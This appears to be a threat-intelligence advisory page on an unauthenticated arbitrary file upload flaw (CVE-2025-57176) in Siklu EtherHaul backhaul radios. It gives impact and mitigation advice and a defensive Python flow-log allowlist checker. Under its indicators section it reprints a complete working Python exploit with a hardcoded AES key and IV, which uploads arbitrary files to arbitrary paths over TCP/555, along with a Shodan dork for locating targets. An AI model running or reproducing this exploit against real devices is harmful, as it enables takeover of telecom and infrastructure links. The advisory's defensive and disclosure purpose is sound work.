Siklu EtherHaul Series EH-8010 - Arbitrary File Upload
The Siklu EtherHaul Series EH-8010 devices are vulnerable to an arbitrary file upload exploit that allows attackers to upload malicious files to the device. This vulnerability can be exploited remotely via the device's web interface, potentially leading to unauthorized code execution or system compromise. The exploit code is publicly available and written in Python, which lowers the barrier to exploitation. Although no known exploits are currently observed in the wild, the vulnerability poses a medium risk due to the potential impact on device integrity and network security. European organizations using these devices in their wireless backhaul infrastructure could face disruptions or unauthorized access if exploited. Mitigation is complicated by the absence of official patches, requiring network segmentation, access restrictions, and monitoring to reduce risk. Countries with significant deployments of Siklu EtherHaul devices, especially those with critical telecom or infrastructure networks, are more likely to be targeted. Given the ease of exploitation and potential impact, the threat severity is assessed as high. Defenders should prioritize identifying affected devices, restricting management interface access, and monitoring for suspicious activity to mitigate risk.
AI Analysis
Technical Summary
The Siklu EtherHaul Series EH-8010 is a wireless backhaul device used primarily in point-to-point communication networks. A recently disclosed vulnerability allows arbitrary file upload via the device's web interface, enabling an attacker to upload malicious files without proper authentication or input validation. This flaw can be exploited remotely, potentially allowing attackers to execute arbitrary code, modify device configurations, or disrupt network operations. The exploit code, written in Python, is publicly available on Exploit-DB (ID 52467), lowering the barrier for exploitation. Although no patches or official advisories have been released, the vulnerability represents a significant risk to the confidentiality, integrity, and availability of networks relying on these devices. The exploit targets the web management interface, which, if exposed to untrusted networks, increases the attack surface. The absence of authentication requirements or weak authentication mechanisms exacerbates the threat. This vulnerability is particularly concerning for organizations that rely on Siklu EtherHaul devices for critical infrastructure connectivity, as compromise could lead to lateral movement within networks or persistent access. The medium severity rating provided likely underestimates the real-world impact given the potential for full device compromise and network disruption.
Potential Impact
European organizations utilizing Siklu EtherHaul EH-8010 devices in their wireless backhaul infrastructure face risks including unauthorized access to network devices, potential interception or manipulation of data traffic, and disruption of critical communication links. Compromise of these devices could allow attackers to pivot into internal networks, undermining confidentiality and integrity of sensitive information. The availability of network services could also be impacted, causing outages or degraded performance in telecommunications or enterprise environments. Given the strategic importance of wireless backhaul in urban and rural connectivity, especially for telecom providers and critical infrastructure operators, exploitation could have cascading effects on service delivery and operational continuity. The lack of patches increases the window of exposure, making proactive mitigation essential. Additionally, regulatory compliance risks arise if data breaches or service disruptions occur due to this vulnerability.
Mitigation Recommendations
Since no official patches are currently available, European organizations should implement the following specific mitigations:
1) Immediately audit and inventory all Siklu EtherHaul EH-8010 devices within the network to identify exposure.
2) Restrict access to the device management web interface by implementing strict network segmentation and firewall rules, allowing only trusted administrative hosts to connect.
3) Disable remote management interfaces if not required or enforce VPN-based access with strong multi-factor authentication.
4) Monitor network traffic and device logs for unusual file upload attempts or unauthorized access patterns.
5) Employ intrusion detection/prevention systems (IDS/IPS) tuned to detect exploitation attempts targeting the EtherHaul web interface.
6) Engage with Siklu support channels to obtain any available firmware updates or workarounds.
7) Consider deploying compensating controls such as application-layer gateways or reverse proxies that can filter malicious requests.
8) Prepare incident response plans specific to potential device compromise scenarios.
These steps go beyond generic advice by focusing on access control, monitoring, and compensating controls tailored to the device and its operational context.
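As an added defender-side illustration of mitigation steps 2 and 4 (this is not code from the advisory, the Exploit-DB entry, or the vendor), the following Python check walks flow records and flags any connection that reaches an inventoried EtherHaul device on a management port from a host outside the administrative allowlist. The device inventory, the admin subnet, the flow-log line format and the sample flows are all constructed assumptions for this example. TCP/555 is the port the published exploit client connects to, and 0x90 bytes is the size of the header it sends first, so a non-allowlisted client that pushes more than a header over that port is rated higher than a bare connection.

```python
"""Allowlist check for EtherHaul management-plane connections.

Assumptions (constructed for this example, not taken from the advisory):
  - ETHERHAUL_DEVICES is the inventory from mitigation step 1.
  - ADMIN_HOSTS is the only network allowed to reach management ports (step 2).
  - Flow lines look like:
      "<timestamp> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <proto> <client_bytes>"
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

ETHERHAUL_DEVICES = {"10.20.0.11", "10.20.0.12"}          # assumed inventory
ADMIN_HOSTS = ipaddress.ip_network("10.99.0.0/24")         # assumed admin subnet

# Management ports worth watching: 555 is the rfpiped service the public
# exploit client talks to; 80/443 cover the web management interface.
MGMT_PORTS = {555: "rfpiped", 80: "http", 443: "https"}

# Header length used by the published client; a larger client byte count on
# TCP/555 means a payload followed the header.
RFPIPED_HDR_LEN = 0x90

FLOW_RE = re.compile(r"^(\S+)\s+(\S+):(\d+)\s+->\s+(\S+):(\d+)\s+(\w+)\s+(\d+)$")


@dataclass(frozen=True)
class Alert:
    timestamp: str
    src: str
    dst: str
    port: int
    service: str
    client_bytes: int
    severity: str   # "high" for a probable upload on 555, else "medium"


def parse_flow(line: str) -> Optional[dict]:
    """Parse one constructed flow line; return None for lines that don't match."""
    m = FLOW_RE.match(line.strip())
    if not m:
        return None
    ts, src, _sport, dst, dport, proto, nbytes = m.groups()
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport),
            "proto": proto.lower(), "bytes": int(nbytes)}


def check_flows(lines: Iterable[str]) -> List[Alert]:
    """Return an Alert for every management-port flow from a non-admin host."""
    alerts: List[Alert] = []
    for line in lines:
        f = parse_flow(line)
        if f is None or f["proto"] != "tcp":
            continue
        if f["dst"] not in ETHERHAUL_DEVICES or f["dport"] not in MGMT_PORTS:
            continue
        try:
            src_ip = ipaddress.ip_address(f["src"])
        except ValueError:
            continue                      # malformed source address, skip
        if src_ip in ADMIN_HOSTS:
            continue                      # allowlisted administrative host
        upload_sized = f["dport"] == 555 and f["bytes"] > RFPIPED_HDR_LEN
        alerts.append(Alert(f["ts"], f["src"], f["dst"], f["dport"],
                            MGMT_PORTS[f["dport"]], f["bytes"],
                            "high" if upload_sized else "medium"))
    return alerts


# Constructed sample flows: one allowlisted admin session, two reaches from an
# external address, one header-only probe from an internal non-admin host,
# one flow to a device not in the inventory, one UDP flow and one junk line.
SAMPLE_FLOWS = [
    "2026-01-18T07:40:01Z 10.99.0.5:51234 -> 10.20.0.11:555 TCP 3200",
    "2026-01-18T07:41:13Z 192.0.2.77:40022 -> 10.20.0.11:555 TCP 4752",
    "2026-01-18T07:41:20Z 192.0.2.77:40023 -> 10.20.0.11:443 TCP 900",
    "2026-01-18T07:42:00Z 10.50.3.9:33000 -> 10.20.0.12:555 TCP 144",
    "2026-01-18T07:43:00Z 10.50.3.9:33001 -> 10.20.0.99:555 TCP 5000",
    "2026-01-18T07:44:00Z 198.51.100.4:5353 -> 10.20.0.11:53 UDP 80",
    "this line is not a flow record",
]

if __name__ == "__main__":
    for a in check_flows(SAMPLE_FLOWS):
        print(f"[{a.severity}] {a.timestamp} {a.src} -> {a.dst}:{a.port} ({a.service}, {a.client_bytes} bytes)")
```

On the constructed sample the check raises three alerts: a high-severity one for the external host that sent more than a header over TCP/555, and two medium ones for the external HTTPS reach and the internal header-only probe. The byte threshold is a coarse heuristic; in practice, pair it with the firewall rule from step 2 so that the alert fires on a denied connection rather than a completed one.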
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Belgium, Poland, Sweden, Finland
Indicators of Compromise
- exploit-code:
# Exploit Title: Siklu EtherHaul Series - Unauthenticated Arbitrary File Upload
# Shodan Dork: "EH-8010" or "EH-1200"
# Date: 2025-08-02
# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
# Software Link: ftp://ftp.bubakov.net/siklu/
# Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
# Tested on: Linux
# CVE: CVE-2025-57176
# Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/

#!/usr/bin/env python3
import argparse, socket, struct
from Crypto.Cipher import AES

PORT = 555
HDR_LEN = 0x90
IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)
KEY = bytes([
    0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5,
    0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17,
    0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0,
    0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82
])

def recv_exact(sock: socket.socket, n: int) -> bytes:
    out = bytearray()
    while len(out) < n:
        chunk = sock.recv(n - len(out))
        if not chunk:
            raise ConnectionError('socket closed')
        out += chunk
    return bytes(out)

def pad16_zero(b: bytes) -> bytes:
    r = len(b) & 0x0F
    return b if r == 0 else (b + b'\x00' * (16 - r))

def hdr_checksum(hdr: bytes) -> int:
    return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF

def build_header(flag: int, msg: int, payload_len: int, path: bytes) -> bytes:
    hdr = bytearray(HDR_LEN)
    hdr[0] = flag & 0xFF
    hdr[1] = msg & 0xFF
    struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF)
    p = path if path.endswith(b'\x00') else (path + b'\x00')
    max_path = HDR_LEN - 0x10
    hdr[0x10:0x10 + min(len(p), max_path)] = p[:max_path]
    struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr))
    return bytes(hdr)

class RFPipeSession:
    def __init__(self, key: bytes, iv0: bytes):
        self.key = key
        self.send_iv = iv0
        self.recv_iv = iv0

    def enc_send(self, sock: socket.socket, data: bytes) -> None:
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv)
        ct = cipher.encrypt(data)
        self.send_iv = ct[-16:]
        sock.sendall(ct)

    def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes:
        if n_plain <= 0:
            return b''
        n_padded = (n_plain + 15) & ~15
        ct = recv_exact(sock, n_padded)
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
        pt = cipher.decrypt(ct)
        self.recv_iv = ct[-16:]
        return pt[:n_plain]

    def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None:
        if len(hdr_plain) != HDR_LEN:
            raise ValueError('header must be 0x90 bytes')
        self.enc_send(sock, hdr_plain)

    def recv_header(self, sock: socket.socket) -> bytes:
        ct = recv_exact(sock, HDR_LEN)
        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
        pt = cipher.decrypt(ct)
        self.recv_iv = ct[-16:]
        return pt

def connect_any(host: str, port: int) -> socket.socket:
    infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
    last_err = None
    for fam, st, proto, _, sa in infos:
        s = socket.socket(fam, st, proto)
        try:
            s.connect(sa)
            return s
        except Exception as e:
            last_err = e
            s.close()
    raise ConnectionError(f'connect failed: {last_err}')

def main():
    ap = argparse.ArgumentParser(description='rfpiped file upload client (msg 0x04)')
    ap.add_argument('target', help='IPv4/IPv6 address')
    ap.add_argument('--path', required=True, help='remote path string for header+0x10 (NUL will be appended)')
    ap.add_argument('--file', required=True, help='local file to send as payload')
    ap.add_argument('--recv', action='store_true', help='receive and print server ACK/response')
    args = ap.parse_args()

    with open(args.file, 'rb') as f:
        payload = f.read()
    path_bytes = args.path.encode('utf-8')
    hdr_plain = build_header(flag=0x00, msg=0x04, payload_len=len(payload), path=path_bytes)

    sess = RFPipeSession(KEY, IV0)
    with connect_any(args.target, PORT) as s:
        sess.send_header(s, hdr_plain)
        if payload:
            sess.enc_send(s, pad16_zero(payload))
        if args.recv:
            rh = sess.recv_header(s)
            flag = rh[0]; rmsg = rh[1]
            rlen = struct.unpack_from('<I', rh, 0x08)[0]
            print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}')
            if rmsg in (0x03, 0x05):
                return
            if rlen:
                body = sess.dec_recv(s, rlen)
                if body.endswith(b'\x00'):
                    body = body[:-1]
                try:
                    print(body.decode('utf-8', errors='replace'))
                except Exception:
                    print(body.hex())

if __name__ == '__main__':
    main()
Technical Details
- EDB-ID: 52467
- Has exploit code: true
- Code language: python
Threat ID: 696c9008d302b072d9ad2ab6
Added to database: 1/18/2026, 7:47:20 AM
Last enriched: 2/5/2026, 9:10:33 AM
Last updated: 2/8/2026, 1:30:24 AM